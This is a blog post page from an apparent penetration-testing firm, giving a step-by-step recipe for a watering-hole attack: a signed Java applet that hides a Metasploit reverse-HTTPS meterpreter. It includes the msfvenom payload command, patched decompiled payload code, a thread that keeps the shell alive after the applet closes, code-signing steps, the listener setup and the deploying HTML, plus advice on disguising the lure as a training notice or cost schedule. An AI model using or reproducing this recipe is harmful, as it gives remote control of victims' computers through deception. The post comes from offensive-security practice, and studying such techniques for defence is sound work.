<!DOCTYPE html>
<html lang="en">












<head>
  



<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta http-equiv="x-ua-compatible" content="ie=edge">


  
<!-- Begin Jekyll SEO tag v2.5.0 -->
<title>Signed Java Applet - Water Hole Attack | Black Lantern Security</title>
<meta name="generator" content="Jekyll v3.7.3" />
<meta property="og:title" content="Signed Java Applet - Water Hole Attack" />
<meta name="author" content="Micheal Reski" />
<meta property="og:locale" content="en" />
<meta name="description" content="Creating a Signed Java Applet to Phish Users" />
<meta property="og:description" content="Creating a Signed Java Applet to Phish Users" />
<link rel="canonical" href="http://172.16.50.95:4000/2016-05-01-signed-java-applet/" />
<meta property="og:url" content="http://172.16.50.95:4000/2016-05-01-signed-java-applet/" />
<meta property="og:site_name" content="Black Lantern Security" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2016-05-01T00:00:00-07:00" />
<script type="application/ld+json">
{"@type":"BlogPosting","url":"http://172.16.50.95:4000/2016-05-01-signed-java-applet/","headline":"Signed Java Applet - Water Hole Attack","dateModified":"2016-05-01T00:00:00-07:00","datePublished":"2016-05-01T00:00:00-07:00","author":{"@type":"Person","name":"Micheal Reski"},"description":"Creating a Signed Java Applet to Phish Users","mainEntityOfPage":{"@type":"WebPage","@id":"http://172.16.50.95:4000/2016-05-01-signed-java-applet/"},"@context":"http://schema.org"}</script>
<!-- End Jekyll SEO tag -->


  

  
    <meta name="keywords" content="cybersecurity,penetration testing,cyber,security,consulting,blue team,red team">
  


<meta name="mobile-web-app-capable" content="yes">

<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-title" content="Black Lantern Security">
<meta name="apple-mobile-web-app-status-bar-style" content="black">

<meta name="application-name" content="Black Lantern Security">
<meta name="msapplication-config" content="/assets/ieconfig.xml">


<meta name="theme-color" content="rgb(25,55,71)">


<meta name="generator" content="Hydejack v8.0.0" />

<link type="application/atom+xml" rel="alternate" href="http://172.16.50.95:4000/feed.xml" title="Black Lantern Security" />



<link rel="alternate" href="http://172.16.50.95:4000/2016-05-01-signed-java-applet/" hreflang="en">

<link rel="shortcut icon" href="/assets/icons/favicon.ico">
<link rel="apple-touch-icon" href="/assets/icons/icon.png">

<link rel="manifest" href="/assets/manifest.json">


  <link rel="dns-prefetch" href="https://fonts.googleapis.com">
  <link rel="dns-prefetch" href="https://fonts.gstatic.com">







<link href="/assets/js/hydejack-8.0.0.js" id="_hrefJS">
<link href="/assets/bower_components/fontfaceobserver/fontfaceobserver.standalone.js" id="_hrefFFO">
<link href="/assets/bower_components/katex/dist/katex.min.js" id="_hrefKatexJS">
<link href="/assets/bower_components/katex/dist/katex.min.css" id="_hrefKatexCSS">
<link href="/assets/img/swipe.svg" id="_hrefSwipeSVG">

<script>
  !function(e,t){"use strict";function n(e,t,n,r){e.addEventListener?e.addEventListener(t,n,r):e.attachEvent?e.attachEvent("on"+t,n):e["on"+t]=n}e.loadJS=function(e,r){var o=t.createElement("script");o.src=e,r&&n(o,"load",r,{once:!0});var a=t.scripts[0];return a.parentNode.insertBefore(o,a),o},e._loaded=!1,e.loadJSDeferred=function(r,o){function a(){e._loaded=!0,o&&n(d,"load",o,{once:!0});var r=t.scripts[0];r.parentNode.insertBefore(d,r)}var d=t.createElement("script");return d.src=r,e._loaded?a():n(e,"load",a,{once:!0}),d},e.setRel=e.setRelStylesheet=function(e){function n(){this.rel="stylesheet"}var r=t.getElementById(e);r.addEventListener?r.addEventListener("load",n,{once:!0}):r.onload=n}}(window,document);
!function(a){"use strict";var b=function(b,c,d){function e(a){return h.body?a():void setTimeout(function(){e(a)})}function f(){i.addEventListener&&i.removeEventListener("load",f),i.media=d||"all"}var g,h=a.document,i=h.createElement("link");if(c)g=c;else{var j=(h.body||h.getElementsByTagName("head")[0]).childNodes;g=j[j.length-1]}var k=h.styleSheets;i.rel="stylesheet",i.href=b,i.media="only x",e(function(){g.parentNode.insertBefore(i,c?g:g.nextSibling)});var l=function(a){for(var b=i.href,c=k.length;c--;)if(k[c].href===b)return a();setTimeout(function(){l(a)})};return i.addEventListener&&i.addEventListener("load",f),i.onloadcssdefined=l,l(f),i};"undefined"!=typeof exports?exports.loadCSS=b:a.loadCSS=b}("undefined"!=typeof global?global:this);
!function(a){if(a.loadCSS){var b=loadCSS.relpreload={};if(b.support=function(){try{return a.document.createElement("link").relList.supports("preload")}catch(b){return!1}},b.poly=function(){for(var b=a.document.getElementsByTagName("link"),c=0;c<b.length;c++){var d=b[c];"preload"===d.rel&&"style"===d.getAttribute("as")&&(a.loadCSS(d.href,d,d.getAttribute("media")),d.rel=null)}},!b.support()){b.poly();var c=a.setInterval(b.poly,300);a.addEventListener&&a.addEventListener("load",function(){b.poly(),a.clearInterval(c)}),a.attachEvent&&a.attachEvent("onload",function(){a.clearInterval(c)})}}}(this);

  window._noPushState = false;
  window._noDrawer = false;
  
    !function(w, d) {
      loadJS(document.getElementById('_hrefFFO').href, function() {
        if ('Promise' in w) Promise.all([
          new FontFaceObserver('Noto Sans').load(),
          new FontFaceObserver('Roboto Slab').load(),
        ]).then(function f() { d.body.className += ' font-active'; }, function() {});
      });
    }(window, document);
  
</script>

<!--[if gt IE 8]><!---->








  <link rel="stylesheet" href="/assets/css/hydejack-8.0.0.css">
  <link rel="stylesheet" href="/assets/icomoon/style.css">
  
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto+Slab:400|Noto+Sans:400,400i,700,700i">
    <noscript>
      <style>
        html { font-family: Noto Sans, Helvetica, Arial, sans-serif!important; }
        h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6, .heading { font-family: Roboto Slab, Helvetica, Arial, sans-serif!important; }
      </style>
    </noscript>
  


<style id="_pageStyle">

.content a:not(.btn){color:#4fb1ba;border-color:rgba(79,177,186,0.2)}.content a:not(.btn):hover{border-color:#4fb1ba}:focus{outline-color:#4fb1ba}.btn-primary{color:#fff;background-color:#4fb1ba;border-color:#4fb1ba}.btn-primary:focus,.btn-primary.focus,.form-control:focus,.form-control.focus{box-shadow:0 0 0 3px rgba(79,177,186,0.5)}.btn-primary:hover,.btn-primary.hover{color:#fff;background-color:#409ba3;border-color:#409ba3}.btn-primary:disabled,.btn-primary.disabled{color:#fff;background-color:#4fb1ba;border-color:#4fb1ba}.btn-primary:active,.btn-primary.active{color:#fff;background-color:#409ba3;border-color:#409ba3}::selection{color:#fff;background:#4fb1ba}::-moz-selection{color:#fff;background:#4fb1ba}

</style>

<!--<![endif]-->




</head>

<body>
  <div class="navbar fixed-top">
  <div class="content">
    <div class="nav-btn-bar">
      <span class="sr-only">Jump to:</span>
      <a id="_menu" class="nav-btn no-hover" href="#_navigation">
        <span class="sr-only">Navigation</span>
        <span class="icon-menu"></span>
      </a>
    </div>
  </div>
</div>
<hr class="sr-only" hidden />


<hy-push-state
  replace-ids="_main"
  link-selector="a[href]:not([href*='/assets/']):not(.external):not(.no-push-state)"
  duration="250"
  script-selector="script:not([type^='math/tex'])"
  prefetch
>
  
    
<div id="rightlogo"><img src="/assets/img/logo1.png"></div>


<main
  id="_main"
  class="content fade-in layout-post"
  role="main"
  data-color="rgb(79,177,186)"
  data-theme-color="rgb(25,55,71)"
  
    data-image="/assets/img/bls_wallpaper.png"
    data-overlay
  
  >
  




<article id="post-signed-java-applet" class="page post mb6" role="article">
  <header>
    <h1 class="post-title">
      
        Signed Java Applet - Water Hole Attack
      
    </h1>

    <p class="post-date heading">
      
      <time datetime="2016-05-01T00:00:00-07:00">01 May 2016</time>
      
      
      
      
      











      











    </p>

    
    

    



  
    <p class="message" >
      Creating a Signed Java Applet to Phish Users

    </p>
  


  </header>

  
    <p><img src="/assets/img/signed-java-applet/java_warning.png" alt="" /></p>

<p>One of the common attack vectors deals with water hole attacks. These attacks are used to tempt users to click on documents, links, and content that will allow execution onto their box. These can take many forms: Microsoft Office macros (Excel, Word), Flash enabled sites, Javascript attacks, and specifically Java signed applets. We’re going to walk you through creating your own java signing certificate (If you don’t have one) and then how to code sign your java applet within NetBeans.</p>

<h3 id="create-your-code-signing-certificate">Create your code signing certificate:</h3>

<p>First let’s create your java certificate file.
Make sure you have openssl installed. If you’re on ubuntu:</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>apt-get install openssl
</code></pre></div></div>

<p>Change directory to the openssl:</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cd /usr/lib/ssl/misc/
</code></pre></div></div>

<p>Execute the CA.sh bash script to create your initital CA authority</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CA.sh -newca
</code></pre></div></div>

<p>Change directory to the new folder, demoCA</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cd demoCA
</code></pre></div></div>

<p>Copy the openssl.cnf from the /usr/lib/ssl/ directory and modify usage for the code signing:</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cp /usr/lib/ssl/openssl.conf .
</code></pre></div></div>

<p>Open openssl.conf and modify the following fields to contain the following values
<strong>Note that a code signing certificate can only be used for code signing</strong></p>

<p>keyUsage = digitalSignature
extendedKeyUsage = codeSigning</p>

<p>Then modify the dir to operate from in the configuration file to the local directory (still within the openssl.conf)[ CA_default ] From
dir = ./demoCA
To
dir = ./</p>

<p>Create the user request based on the configuration you modified</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>openssl req -new -keyout user.key -out user.req -config
</code></pre></div></div>

<p>Sign the certificate by the CA</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>openssl ca -policy policy_anything -config -out user.pem -infiles user.req
</code></pre></div></div>

<p>Export the certificate in pk12 format.</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>openssl pkcs12 -export -in user.pem -inkey user.key -out user.p12 -name -caname -chain -CAfile ./cacert.pem
</code></pre></div></div>

<p>Convert the CA certificate into pk12 format:</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>openssl pkcs12 -export -out root_cert.pfx -inkey ./private/cakey.pem -in cacert.pem -certfile cacert.pem
</code></pre></div></div>

<p>Convert the user code signing certificate into java jks storage
<strong>Note, make sure you remember the alias used when creating the user certificate. You can view it by executing the following:</strong></p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>keytool -v -list -storetype pkcs12 -keystore user.p12
</code></pre></div></div>

<p>Convert the certificate to jks:</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>keytool -importkeystore -srckeystore user.p12 -srcstoretype pkcs12 -srcalias -destkeystore user.jks -deststoretype jks -deststorepass password -destalias
</code></pre></div></div>

<p>Copy the user.p12 and root_cert.pfx to the systems that will be utilizing the Java applet. Copy the user.jks to the system that will be signing the applet.</p>

<p>Generate the meterpreter jar file
Use your latest Kali VM, use msfvenom in order to create your jar file that you will use to decompile and insert into your java program.</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msfvenom -p java/meterpreter/reverse_https -f raw LHOST=192.168.1.5 LPORT=443 &gt; java_rhttps.jar
</code></pre></div></div>

<p>Download jd-gui from http://jd.benow.ca/ to decompile the jar.</p>

<p>Export all the sources to a zip file and we will import them into our java project.</p>

<p><img src="/assets/img/signed-java-applet/jd-gui.png" alt="" /></p>

<h3 id="creating-the-signed-java-applet">Creating the signed java applet</h3>

<p>Make sure you have the latest Netbeans installed. Create a new project in netbeans. The narrative here is to create a java applet that doesn’t call too much attention to itself, but the victims will still have a reason to click on it. A training requirement, an updated cost schedule, or something that would require them to launch a browser and view the information.</p>

<p>With Netbeans, you can create java fxml projects with are a bit snazzier when it comes to their display. You can spend alot of time creating your java applet, but for the purposes of this post we’ll stick with something simple.</p>

<p>After you’ve got your shell java program, we need to add some code to launch our new thread which will kick off our java meterpreter. This will also be useful so that if the browser or java applet gets closed, our java meterperter will stay running in the background.</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Thread</span> <span class="n">athread</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Thread</span><span class="o">(</span><span class="k">new</span> <span class="n">Runnable</span><span class="o">(){</span>
   <span class="nd">@Override</span>
   <span class="kd">public</span> <span class="kt">void</span> <span class="nf">run</span><span class="o">(){</span>
       <span class="k">try</span><span class="o">{</span>
        <span class="n">Payload</span><span class="o">.</span><span class="na">main</span><span class="o">(</span><span class="k">new</span> <span class="n">String</span><span class="o">[</span><span class="mi">0</span><span class="o">]);</span>
       <span class="o">}</span>
       <span class="k">catch</span><span class="o">(</span><span class="n">Exception</span> <span class="n">e</span><span class="o">){}</span>
   <span class="o">}</span>
<span class="o">});</span>
<span class="n">athread</span><span class="o">.</span><span class="na">start</span><span class="o">();</span>
</code></pre></div></div>

<p>You also need to run your codebase from the context of an applet. Add another class file to run your applet from:</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">package</span> <span class="n">newProject</span><span class="o">;</span>
 
<span class="kn">import</span> <span class="nn">java.applet.Applet</span><span class="o">;</span>
 
<span class="kd">public</span> <span class="kd">class</span> <span class="nc">webApplet</span> <span class="kd">extends</span> <span class="n">Applet</span><span class="o">{</span>
 <span class="kd">public</span> <span class="kt">void</span> <span class="nf">init</span><span class="o">()</span> <span class="o">{</span>
 <span class="n">newProject</span><span class="o">.</span><span class="na">mainJavaClass</span><span class="o">.</span><span class="na">main</span><span class="o">(</span><span class="kc">null</span><span class="o">);</span>
 <span class="o">}</span>
<span class="o">}</span>
</code></pre></div></div>

<h3 id="importing-metasploit-java-code-into-applet">Importing metasploit java code into applet</h3>

<p>Create a new package in your java program, name it “metasploit”. Then copying the source files under the metasploit package you exported from jd-gui, copy the Payload.java and the PayloadTrustManager.java into the this package. You will also need the metasploit.dat file. This needs to be copied into the , which can be done by just drag and dropping it into the “source packages”. It should create the package for you.</p>

<p><img src="/assets/img/signed-java-applet/packages_java.png" alt="" /></p>

<p>You will notice that there are a few syntax errors with this code. I believe this is due to the fact that when jd-gui decompiles the jar file, some of the code isn’t interpreted correctly, and as such you will have to do some spot clean up.</p>

<p>I’ve made a quick list below of the line number and the corrected code that needs to be done.
After all of this is setup, you can now phish users with a signed Java Applet. Make sure that the certificate that was used in the signing is trusted by the users (By previous exploitation and deploying your own root CA, or by using a trusted vendor of code signing).
Note: If you need to clear out the java cache, follow the instructions at https://www.java.com/en/download/help/plugin_cache.xml.</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">//Line 55</span>
<span class="n">File</span> <span class="n">localObject1</span> <span class="o">=</span> <span class="k">new</span> <span class="n">File</span><span class="o">(</span><span class="n">localFile1</span><span class="o">.</span><span class="na">getAbsolutePath</span><span class="o">()</span> <span class="o">+</span> <span class="s">".dir"</span><span class="o">);</span>
<span class="c1">//Line 56</span>
<span class="o">((</span><span class="n">File</span><span class="o">)</span><span class="n">localObject1</span><span class="o">).</span><span class="na">mkdir</span><span class="o">();</span>
<span class="c1">//Line 93 - 100</span>
<span class="n">File</span><span class="o">[]</span> <span class="n">localObject6a</span> <span class="o">=</span> <span class="k">new</span> <span class="n">File</span><span class="o">[]</span> <span class="o">{</span> <span class="o">(</span><span class="n">File</span><span class="o">)</span><span class="n">localObject3</span><span class="o">,</span> <span class="o">((</span><span class="n">File</span><span class="o">)</span><span class="n">localObject3</span><span class="o">).</span><span class="na">getParentFile</span><span class="o">(),</span> <span class="o">(</span><span class="n">File</span><span class="o">)</span><span class="n">localObject2</span><span class="o">,</span> <span class="o">(</span><span class="n">File</span><span class="o">)</span><span class="n">localFile3</span> <span class="o">};</span>
     <span class="k">for</span> <span class="o">(</span><span class="kt">int</span> <span class="n">k</span> <span class="o">=</span> <span class="mi">0</span><span class="o">;</span> <span class="n">k</span> <span class="o">&lt;</span> <span class="n">localObject6a</span><span class="o">.</span><span class="na">length</span><span class="o">;</span> <span class="n">k</span><span class="o">++)</span> <span class="o">{</span>
          <span class="k">for</span> <span class="o">(</span><span class="n">m</span> <span class="o">=</span> <span class="mi">0</span><span class="o">;</span> <span class="o">(</span><span class="n">m</span> <span class="o">&lt;</span> <span class="mi">10</span><span class="o">)</span> <span class="o">&amp;&amp;</span> <span class="o">(!</span><span class="n">localObject6a</span><span class="o">[</span><span class="n">k</span><span class="o">].</span><span class="na">delete</span><span class="o">());</span> <span class="n">m</span><span class="o">++)</span>
          <span class="o">{</span>
               <span class="n">localObject6a</span><span class="o">[</span><span class="n">k</span><span class="o">].</span><span class="na">deleteOnExit</span><span class="o">();</span>
               <span class="n">Thread</span><span class="o">.</span><span class="na">sleep</span><span class="o">(</span><span class="mi">100L</span><span class="o">);</span>
          <span class="o">}</span>
     <span class="o">}</span>
<span class="c1">//Line 114</span>
<span class="n">Runtime</span><span class="o">.</span><span class="na">getRuntime</span><span class="o">().</span><span class="na">exec</span><span class="o">(</span><span class="k">new</span> <span class="n">String</span><span class="o">[]</span> <span class="o">{</span> <span class="s">"chmod"</span><span class="o">,</span> <span class="s">"+x"</span><span class="o">,</span> <span class="o">(</span><span class="n">String</span><span class="o">)</span><span class="n">localObject1</span> <span class="o">}).</span><span class="na">waitFor</span><span class="o">();</span>
<span class="c1">//Line 122</span>
<span class="n">Runtime</span><span class="o">.</span><span class="na">getRuntime</span><span class="o">().</span><span class="na">exec</span><span class="o">(</span><span class="k">new</span> <span class="n">String</span><span class="o">[]</span> <span class="o">{</span> <span class="o">(</span><span class="n">String</span><span class="o">)</span><span class="n">localObject1</span> <span class="o">});</span>
<span class="c1">//Line 175 - 177</span>
<span class="n">Object</span><span class="o">[]</span> <span class="n">localObject6b</span> <span class="o">=</span> <span class="o">(</span><span class="n">Object</span><span class="o">[])</span><span class="n">Class</span><span class="o">.</span><span class="na">forName</span><span class="o">(</span><span class="s">"saic.AESEncryption"</span><span class="o">).</span><span class="na">getMethod</span><span class="o">(</span><span class="s">"wrapStreams"</span><span class="o">,</span> <span class="k">new</span> <span class="n">Class</span><span class="o">[]</span> <span class="o">{</span> <span class="n">InputStream</span><span class="o">.</span><span class="na">class</span><span class="o">,</span> <span class="n">OutputStream</span><span class="o">.</span><span class="na">class</span><span class="o">,</span> <span class="n">String</span><span class="o">.</span><span class="na">class</span> <span class="o">}).</span><span class="na">invoke</span><span class="o">(</span><span class="kc">null</span><span class="o">,</span> <span class="k">new</span> <span class="n">Object</span><span class="o">[]</span> <span class="o">{</span> <span class="n">localObject3</span><span class="o">,</span> <span class="n">localObject4</span><span class="o">,</span> <span class="n">localObject5</span> <span class="o">});</span>
<span class="n">localObject3</span> <span class="o">=</span> <span class="o">(</span><span class="n">InputStream</span><span class="o">)</span><span class="n">localObject6b</span><span class="o">[</span><span class="mi">0</span><span class="o">];</span>
<span class="n">localObject4</span> <span class="o">=</span> <span class="o">(</span><span class="n">OutputStream</span><span class="o">)</span><span class="n">localObject6b</span><span class="o">[</span><span class="mi">1</span><span class="o">];</span>
<span class="c1">//Line 277</span>
<span class="n">String</span> <span class="n">localObject</span> <span class="o">=</span> <span class="n">localStringTokenizer</span><span class="o">.</span><span class="na">nextToken</span><span class="o">();</span>
</code></pre></div></div>

<p>You can see that most of the issues revolve around the general Object class not being appropriately casted as the required type.
This should fix any errors regarding the metapsloit code.</p>

<h3 id="setting-up-the-jks-signing">Setting up the JKS signing</h3>

<p>From the first step above, you converted the code signing certificate into a jks key store file. This is what we will need to generate the signed jar file using netbeans.
Right click your project and goto “Properties”.
Goto Application -&gt;Web Start
Click “Enable Web Start” Checkbox
Change codebase to “No Codebase”</p>

<p><img src="/assets/img/signed-java-applet/settings1.png" alt="" /></p>

<p>Under signing click “Customize”. Select “Sign by a specified key”. Find the jks file under the “Keystore Path”. Type in your keystore password along with your alias name.
For mixed code it should be set to “Enable Software Protections”.</p>

<p><img src="/assets/img/signed-java-applet/settings2.png" alt="" /></p>

<p>After all these settings have been setup, you should be able to run your Java program from Netbeans. You should get your normal java program running along with Metasploit running in the background.</p>

<h3 id="setting-up-msfconsole">Setting up msfconsole</h3>

<p>From the msfconsole, use the following to catch the java meterpreter:</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use exploit/multi/handler
set payload java/meterpreter/reverse_https
set lhost IP_Address
set lport 443
set exitonsession false
exploit -j -z
</code></pre></div></div>

<h3 id="web-applet-compiling">Web Applet Compiling</h3>

<p>Now to get it working for web applet. After adding the metasploit codebase to the project, fixing the errors, and testing it, we need to deploy it to the web server.</p>

<p>Compile the latest build for your project and goto the dist directory. Copy all the files there. Should be:</p>

<p>launch.html
launch.jnlp
newProject.jar
README.TXT
Copy these files to your apache2/nginix server. For Apache2, copy these files under /var/www/html. Then create/modify your index.html file with the following content:</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;applet</span> <span class="na">id=</span><span class="s">"newProject"</span> <span class="na">width=</span><span class="s">"400"</span> <span class="na">height=</span><span class="s">"800"</span> <span class="na">codebase=</span><span class="s">"http://192.168.1.5"</span> <span class="na">archive=</span><span class="s">"newProject.jar"</span> <span class="na">code=</span><span class="s">"newProject.webApplet"</span><span class="nt">&gt;</span>
<span class="nt">&lt;/applet&gt;</span>
</code></pre></div></div>

<p>After all of this is setup, you can now phish users with a signed Java Applet. Make sure that the certificate that was used in the signing is trusted by the users (By previous exploitation and deploying your own root CA, or by using a trusted vendor of code signing).
Note: If you need to clear out the java cache, follow the instructions at https://www.java.com/en/download/help/plugin_cache.xml.</p>

  
</article>


<hr class="dingbat related" />




  
     


  <aside class="about related mt4 mb4" role="complementary">
    
    

<div class="author mt4">
  

  

  
  
  <h2  class="page-title hr">
    About
  </h2>

  <p>Micheal Reski is a principal in Black Lantern Security.</p>


  <div class="sidebar-social">
    <span class="sr-only">Social:</span>
<ul>
  
    
    
      



  

  
  
  
  

  

  

  <li>
    <a href="https://twitter.com/aconite33" title="Twitter" class="no-mark-external">
      <span class="icon-twitter"></span>
      <span class="sr-only">Twitter</span>
    </a>
  </li>


    

    
    
      



  

  
  
  
  

  

  

  <li>
    <a href="https://github.com/aconite33" title="GitHub" class="no-mark-external">
      <span class="icon-github"></span>
      <span class="sr-only">GitHub</span>
    </a>
  </li>


    

    
    
      



  

  
  
  
  

  

  

  <li>
    <a href="mailto:micheal@blacklanternsecurity.com" title="Email" class="no-mark-external">
      <span class="icon-mail"></span>
      <span class="sr-only">Email</span>
    </a>
  </li>


    
  
</ul>

  </div>
</div>

  </aside>


  

  
  

  
    




<aside class="related mb4" role="complementary">
  <h2 class="hr">Related Posts</h2>

  <ul class="related-posts">
    
      


<li>
  <a href="/2017-01-01-cybersecurity-exposure/" class="h4 flip-title">
    <span>What’s my exposure?</span>
  </a>
  <time class="heading faded fine" datetime="2017-01-01T00:00:00-08:00">01 Jan 2017</time>
</li>

    
  </ul>
</aside>


  


  


  
<footer role="contentinfo">
  <hr/>
  
    <p><small class="copyright">© 2018 | All rights reserved | 1 Cool Blow Suite 322 Charleston, SC 29403 | 843.991.4612
</small></p>
  
  
  <hr class="sr-only"/>
</footer>


</main>

    <hy-drawer
  class=""
  align="left"
  threshold="10"
  touch-events
  prevent-default
>
  <header id="_sidebar" class="sidebar" role="banner">
    
    <div class="sidebar-bg sidebar-overlay" style="background-color:rgb(25,55,71);background-image:url(/assets/img/bls_wallpaper.png)"></div>

    <div class="sidebar-sticky">
      <div class="sidebar-about">
        
        <h2 class="h1"><a href="/">Black Lantern Security</a></h2>
        
        
          <p class="">
            Attack To Defend

          </p>
        
      </div>

      <nav class="sidebar-nav heading" role="navigation">
        <span class="sr-only">Navigation:</span>
<ul>
  
  
  
  
    
      <li>
        <a
          id="_navigation"
          href="/blog/"
          class="sidebar-nav-item"
          
          >
          Blog
        </a>
      </li>
    
  
    
      <li>
        <a
          
          href="/jobs/"
          class="sidebar-nav-item"
          
          >
          Jobs
        </a>
      </li>
    
  
    
      <li>
        <a
          
          href="/about/"
          class="sidebar-nav-item"
          
          >
          About Us
        </a>
      </li>
    
  
    
      <li>
        <a
          
          href="/contactus/"
          class="sidebar-nav-item"
          
          >
          Contact Us
        </a>
      </li>
    
  
</ul>

      </nav>

      

      <div class="sidebar-social">
        <span class="sr-only">Social:</span>
<ul>
  
    
      



  

  
  
  
  

  

  

  <li>
    <a href="https://twitter.com/blacklanterninc" title="Twitter" class="no-mark-external">
      <span class="icon-twitter"></span>
      <span class="sr-only">Twitter</span>
    </a>
  </li>


    
      



  

  
  
  
  

  

  

  <li>
    <a href="https://github.com/blacklanternsecurity" title="GitHub" class="no-mark-external">
      <span class="icon-github"></span>
      <span class="sr-only">GitHub</span>
    </a>
  </li>


    
      



  

  
  
  
  

  

  

  <li>
    <a href="mailto:info@blacklanternsecurity.com" title="Email" class="no-mark-external">
      <span class="icon-mail"></span>
      <span class="sr-only">Email</span>
    </a>
  </li>


    
      



  

  
  
  
  

  

  

  <li>
    <a href="https://facebook.com/BLSRI" title="Facebook" class="no-mark-external">
      <span class="icon-facebook"></span>
      <span class="sr-only">Facebook</span>
    </a>
  </li>


    
  
</ul>

      </div>
    </div>
  </header>
</hy-drawer>
<hr class="sr-only" hidden />

  
</hy-push-state>


  <!--[if gt IE 9]><!---->
  <script>window.loadJSDeferred(document.getElementById('_hrefJS').href);</script>
  

  <!--<![endif]-->

  


  <script>
    if ('serviceWorker' in navigator) {
      
        navigator.serviceWorker.register('/sw.js')
          .then(r => r.update())
          .catch(() => {});
      
    }
  </script>






<h2 class="sr-only" hidden>Templates (for web app):</h2>

<template id="_animation-template" hidden>
  <div class="animation-main fixed-top">
    <div class="content">
      <div class="page"></div>
    </div>
  </div>
</template>

<template id="_loading-template" hidden>
  <div class="loading">
    <span class="sr-only">Loading…</span>
    <span class="icon-cog"></span>
  </div>
</template>

<template id="_error-template" hidden>
  <div class="page">
    <h1 class="page-title">Error</h1>
    
    
    <p class="lead">
      Sorry, an error occurred while loading <a class="this-link" href=""></a>.

    </p>
  </div>
</template>

<template id="_back-template" hidden>
  <a id="_back" class="back nav-btn no-hover">
    <span class="sr-only">Back</span>
    <span class="icon-arrow-left2"></span>
  </a>
</template>

<template id="_permalink-template" hidden>
  <a href="#" class="permalink">
    <span class="sr-only">Permalink</span>
    <span class="icon-link"></span>
  </a>
</template>




</body>
</html>
